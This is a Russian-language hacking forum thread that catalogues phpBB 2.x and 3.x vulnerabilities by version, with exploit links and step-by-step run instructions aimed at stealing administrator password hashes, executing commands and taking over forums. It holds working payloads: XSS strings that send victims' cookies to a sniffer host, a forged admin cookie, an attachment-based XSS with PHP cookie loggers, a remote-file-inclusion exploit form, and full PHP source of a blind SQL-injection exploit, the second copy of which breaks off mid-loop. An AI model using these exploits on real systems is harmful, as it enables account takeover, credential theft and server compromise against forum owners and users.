Сообщений в теме: 8

[###]

Рассмотрим каждую версию форума по порядку и проанализируем. Будем рассматривать с версии 2.0.4, т.к. версии младше, обсуждать нет смысла.

phpBB <= 2.0.4
Цель: просмотр содержимого файлов на сервере
Описание: Была выпущена в 2002. Данная версия почти не присутствует в сети.
Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.
Exploit: ]]>http://milw0rm.com/id.php?id=47]]>

phpBB <= 2.0.5
Цель: просмотр hash'a пароля
Описание: Выпущена в 2002. Также редкая версия.
Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в при обработке $topic_id. Возможно добавить 2 запрос, тем самым захватить хэш.
Exploit: ]]>http://milw0rm.com/id.php?id=44]]>
При запуске $remote = shift || 'localhost'; - изменяем на нужный например 255.255.255.255, $uid = shift || 2; - ID нужного нам пользователя. В форумах phpBB ID администратора по умолчанию "2". Затем пишем "perl exp.pl"
Video: -

phpBB <= 2.0.6
Цель: просмотр hash'a пароля
Описание: Выпущена в 2002. Также редкая версия.
Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в модуле search.php.
Exploit: ]]>http://milw0rm.com/id.php?id=137]]>
Запускаем "perl exp.pl <server> <folder> <user_id> <search_id>"
Где <server> - ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "ping test.com"), <folder> - папка где находится сам форум (например если у нас ]]>http://123.123.123.123/forum/index.php]]>, вместо <folder> пишем forum), <user_id> <search_id> - ID пользователя.
Video: ]]>http://video.anticha...bb_206_sql2.rar]]>

phpBB <= 2.0.8
Цель: подмена ip
Описание: так себе
Описание уязвимости: позволяет подменить ip отправителя на произвольный
Exploit: ]]>http://securityvulns...ocument110.html]]>

phpBB 2.0.10
Пропустим версии с 7 по 9, т.к. в них присутствует те же уязвимости, что и в phpBB 2.0.10.
Цель: (1) Выполение произвольных команд.
Описание: Была выпущена так же в 2002. Данная версия встречается намного чаще, чем младшие. Но реже чем старшие =). Был произведён дефейс сайта phpbb.com, с помощью найденной уязвимости в этой версии.
Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php.
Exploit: ]]>http://milw0rm.com/id.php?id=647]]> Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]"
Где [*URL] - урл сайта (например ]]>http://www.test.com)]]>, [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд *nix ]]>http://forum.anticha...7345-1-10.html)]]>
video: -

Цель: (2) Попадание в админку обходя ограничения.
Описание: -
Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.
Exploit: В архиве с видео =)
Video: ]]>http://video.anticha...ackbbshwizi.rar]]>

phpBB <= 2.0.11
Цель: Выполение произвольных команд
Описание: Была выпущена так же в 2002.
Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php - горе-кодеры плохо запатчили предыдущую багу - фильтрация ковычки обходится как %2527
Exploit: ]]>http://www.site.ru/f...?t=2...ster=`$v]]> ar%60.%2527&var=id

phpBB <= 2.0.12
Цель: Вход на форум аккаунтом администратора.
Описание: -
Описание уязвимости: Для начала нам следует зарегаться на форуме. Затем, войти под своим аккаунтом и если стоит галка "Автоматический вход",то убрать её. Нам нужно отредактировать кукисы (посоветую делать это в опере Tools->Advanced->Cookies),
вместо X - наш ID ,
а меняем на 2 - как уже говорилось выше, ID админа
Exploit: "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"
Video: -

phpBB <= 2.0.13
Цель: просмотр hash'a пароля, любого пользователя
Описание: -
Описание уязвимости: Уязвимость присутствует в модуле downloads.php. Есть возможность SQL инъекции
Exploit: ]]>http://milw0rm.com/id.php?id=907]]>
Запускать "perl exp.pl <site> <dir> <id>"
Где <site> URL сайта <dir> - директория <id> - нужный нам пользователь
Video: -

phpBB <= 2.0.15
Цель: получение Имя,Логина, Пароля от БД.
Описание: -
Описание уязвимости: Уязвимость пристутствует в модуле viewtopic.php.
Exploit: ]]>http://milw0rm.com/id.php?id=1080]]> Запускать "perl exp.pl <server> <dir> <id> \r\n"
Где <server> - ip сервера, <dir> - директория в которой находится форум <id> номер существующего топика.
Video: -

phpBB <= 2.0.16
Цель: получение hash'a пароля пользователя
Описание: -
Описание уязвимости: В данной версии присутствует XSS (Cross Site Scripting более подробно про XSS можно почитать тут ]]>http://antichat.ru/txt/xssoverview/]]> или ]]>http://ha.ckers.org/xss.html)]]>, которая получить кукисы. Они высылаются на сниффер,
логи которого можно посмотреть здесь ]]>http://antichat.ru/sniff/log.php]]>.
Exploit:

[*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style=
'top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'
+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

phpBB <= 2.0.16
Цель: 2.0.16 Installation Path Disclosure
Описание: -
Описание уязвимости: раскрытие данных
Exploit: ]]>http://someshit.net/...thread.php?t=71]]>
Video: -

phpBB <= 2.0.17
Цель: выполнение произвольных команд на сервере(php-inj)
Описание: -
Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php.
Exploit: ]]>http://rst.void.ru/d...57phpbb2017.txt]]> Запускать "perl exp.pl <URL> <cmd>"
Где <URL> - ссылка до форума например ]]>http://site.com/phpBB/]]>, <cmd> - нужная команда (о командах читаем тут ]]>http://forum.anticha...7345-1-10.html)]]>.
Video: -

phpbb <= 2.0.18
Цель: получение сессии админа
Описание: XSS в собщении
Описание уязвимости: требует включеных BB-тэгов или HTML на форуме
Exploit:

<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X="<B "> H A L L O </B>
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=
new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`
style='font-size:0; X="<B ">'</B>[url]http://www.[url=http://wj.com/style=display:none;background:url(java script:alert()) ]wj[/url][/url]

phpBB <= 2.0.18
Цель: получение hash'a пароля пользователя
Описание: найдена WJ (White Jordan =)
Описание уязвимости: В данной версии присутствует XSS.
Exploit:

[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+
#108;&+#40;&+#106;&+#97;&+#118;&+#97;
&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+
#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;
&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;
&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+
#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;
&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]

Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"&#40")

phpBB <= 2.0.18
Цель: подмена ника
Описание: найдена Dgoing
Описание уязвимости: подмена ника, обход бана
Exploit: ]]>http://forum.anticha...hread19817.html]]>
Video: -

phpbb <= 2.0.19
Цель: получение сессии админа
Описание: XSS в собщении
Описание уязвимости: требует включеных BB-тэгов или HTML на форуме
Exploit:

<B C='>' onmouseover='alert(document.location="http://antichat.ru"+document.cookie)' X='<B   '> antichat.ru </B>
[url]http://www.[email=http://wj.com/style=display:none;background:url(java script:alert()) ]wj[/email][/url][email=http://wj.com/style=display:none;background:url(java script:alert()) ][/email]

phpbb <= 2.0.19
Цель: получение пароля админа
Описание: phpBB Style Changer\Viewer MOD SQL injection Exploit
Описание уязвимости: sql-inj уязвимость в index.php?s=[SQL] позволяет выполнить произвольный запрос в бд
Exploit: ]]>http://milw0rm.com/exploits/1469]]>

phpbb = 2.0.19
Цель: DoS форума
Описание: -
Описание уязвимости: Уязвимость позволяет забанить всех пользователей на форуме
Exploit: ]]>http://forum.comp-in...hp?threadid=238]]>

phpbb <= 2.0.19
Цель: DoS форума
Описание: Neo Security Team (автор - HaCkZaTaN)
Описание уязвимости: Сплоит регистрирует неограниченное количество ников или делает через поиск запросы, которые база не может воспринять. Сплойт бессилен там, где надо вводить код (визуальное подтверждение) при регистрации
Exploit: ]]>http://www.h4cky0u.o...6-001-phpbb.txt]]>

phpbb <= 2.0.19
Цель: получение пароля админа
Описание: Уязвимость позволяет удаленному пользователю произвести брут-форс атаку.
Описание уязвимости: Уязвимость существует из-за того, что функция "gen_rand_string()" генерирует угадываемые случайные номера. Удаленный пользователь может изменить пароль к целевой учетной записи с помощью функционала восстановления пароля путем отправки большого количества запросов для подбора Validation ID (не более 1000000 запросов). Для удачной эксплуатации уязвимости злоумышленнику необходимо знать e-mail целевой учетной записи.
Exploit: ]]>http://milw0rm.com/exploits/1382]]>

phpbb <= 2.0.20
Цель: DoS форума
Описание: банит все аккаунты
Описание уязвимости: по умолчанию в форуме включен бан аккаунта при более 5 неудачных попыток входа
Exploit: phpBB 2.0.20 Disable Admin or User Account
Video: -

phpBB <= 2.0.21
Цель: компрометация сервера
Описание: obviously you have no output, but this makes phpbb to be like a http proxy
Описание уязвимости: а в переводе - phpbb можно использовать как прокси, посылая запрос в удаленном урле аватара; также форум не проверяет контент загружаемых аватарах в EXIF тэгах, туда мона поместить PHP-код и потом какнить приинклудить. Вот.
Exploit: ]]>http://www.securityf...rchive/1/433858]]>

phpBB <= 2.0.21
Цель: получение сессии админа
Описание: XSS нападение и CSRF атака
Описание уязвимости: 1)Уязвимость существует из-за того, что приложение не проверяет валидность HTTP запроса при отправке сообщений. 2) Уязвимость существует из-за недостаточной обработки входных данных в поле "Message body" в сценарии privmsg.php.
Exploit: ]]>http://www.securityl...lity/281494.php]]>

[$iD]

phpBB 3 (memberlist.php) Remote SQL Injection Exploit

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosuren";
echo "by rgod rgod@autistici.orgn";
echo "site: http://retrogod.altervista.orgn";
echo "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"nn";

/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONSn";
echo "host: target server (ip/hostname)n";
echo "path: path to phpbb3n";
echo "user/pass: u need a valid user account with global moderator rightsn";
echo "Options:n";
echo " -T[prefix] specify a table prefix different from default (phpbb_)n";
echo " -p[port]: specify a port other than 80n";
echo " -P[ip:port]: specify a proxyn";
echo " -u[number]: specify a user id other than 2 (admin)n";
echo " -x: disclose table prefix through error messagesn";
echo "Example:rn";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-urn";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7n";
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}
}
return $exa."rn".$result;
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "rn".$html;
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
$user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
$discl=1;
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0rn";
$packet.="Referer: http://$host$path/ucp.php?mode=loginrn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Accept-Encoding: text/plainrn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closernrn";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
//echo $html."n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."rn";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=
%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closern";
$packet.="Cookie: ".$cookie." rnrn";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."n";sleep(2);
}
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) 
FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."
POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=
%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closern";
$packet.="Cookie: ".$cookie." rnrn";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]rn";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) 
FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."
POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=
%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closern";
$packet.="Cookie: ".$cookie." rnrn";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]rn";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------rn";
echo "admin -> ".$admin."rn";
echo "password (md5) -> ".$password."rn";
echo "--------------------------------------------------------------------rn";

function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}

if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>

[$iD]

Exploit: Xss phpBB 3.0

Author: SpiderZ

_________________________________________________________________________


Download: http://www.phpbb.it/download/phpBB-3.0.B1.zip

_________________________________________________________________________


Open a text editor such as "notebook"

Enter the following script   
Code:

<script> document.location.replace ( 'http://WWW.SITOWEB/FILE.php?c =' + document.cookie); </ script>

Save the file in img.gif (. GIF)

When you are posting, Vai down on "Attachment uploading"

Show your image.

Now at the bottom are "Posted attachments" and under it your image inserted eg ciao.gif

Now take the direct link of img. Eg:
Code:

http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif

Now just have to disguise the link

Example:
Code:

[url = http://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif] Bella girl[/url]

Now all those who use Internet Explorer as your browser, and visit your link ...
Get their cookies.

Log cookies (File.php)

$ Ip = $ _SERVER [ 'REMOTE_ADDR'];
$ UserAgent = $ _SERVER [ 'HTTP_USER_AGENT'];
$Accept $ = $ _SERVER [ 'HTTP_ACCEPT_LANGUAGE'];
$Cookie = $ _GET [ 'c'];
$Myemail = "YOUR E-MAIL;
$Date = today ( "l, j F, Y, g: ia");
$Subject = "Xss phpBB 3";
$Message = "Xss phpBB 3 () 2006
Ip: $ ip
Cookies: $ cookies
Browser: $ userAgent
Language: $ accept
URL: Basic $
Day & Time: $ today \ n";
$ From = "From: $ myemail \ r \ n";
Mail ($ myemail, $ subject, $ message, $ from);
?>

**************************************
Change: $ myemail = "YOUR E-MAIL;

Eg: tua@mail.com
**************************************

Log cookies Alternative (File.php)

$ Cookie = $ _GET [ 'c'];
$ Ip = getenv ( 'REMOTE_ADDR');
$ Date = date ( "j F, Y, g: ia");
$ Referer = getenv ( 'HTTP_REFERER');
$ Fp = fopen ( 'file.txt', 'a');
Fwrite ($ fp, 'Cookie:'. $ Cookies. '<br> IP:'. $ Ip. '<br> Date and Time:'. $ Date. '<br> Referer:'. $ Referer. '< br> <br> <br> ');
Fclose ($ fp);
?>

[###]

Цель: phpBB Add-on Fishing Cat Portal
Воздействие: Выполнение произвольных команд

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</title>

<script language="Javascript">

//'Bug found and Exploit coded by bd0rk
//'Vendor: http://www.foxymods-phpbb.com/
//'Download: http://www.foxymods-phpbb.com/download.php?id=7
//'Contact: bd0rk[at]hackermail.com

//'Vulnerable Code in line 21: include_once($phpbb_root_path . 'includes/lite.'.$phpEx);
//'$phpbb_root_path is not declared before include
//'Greetings: str0ke, TheJT, rgod, Frauenarzt

//#The german Hacker bd0rk

var dir="/includes/"
var file="/functions_portal.php?"
var parameter ="phpbb_root_path="
var shell="Insert your shellcode here"

function command() {
if (document.rfi.target1.value==""){
alert("Exploit failed...");
return false;
}

rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
rfi.submit();
}
</script>
</head>

<body bgcolor="#000000">
<center>

<p><b><font face="Verdana" size="2" color="#008000">Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</font></b></p>

<p></p>
<form method="post" target="getting" name="rfi" onsubmit="command();">
   <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
 </font><font color="#FF0000" size="2"> </font></b>
 <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="java script:this.style.background='#808080';" onmouseout="java script:this.style.background='#808000';"></p>
 <p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>

<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
</center>
</body>

</html>

[###]

Эксплойт под phpbb 3 версии:

Скрытый текст

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by Prohax a@prohax.net.tc\n";
echo "site: ]]>[url="http://forum.prologic.su/go.php?http://url=http://h4cky0u.org\n&quot;;"]http://h4cky0u.org\n...0u.org\n";[/url]]]>
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";

/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to phpbb3\n";
echo "user/pass: u need a valid user account with global moderator rights\n";
echo "Options:\n";
echo " -T[prefix] specify a table prefix different from default (phpbb_)\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo " -u[number]: specify a user id other than 2 (admin)\n";
echo " -x: disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)   ';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h   tml))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
$user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
$discl=1;
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
//echo $html."\n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_selec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_selec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
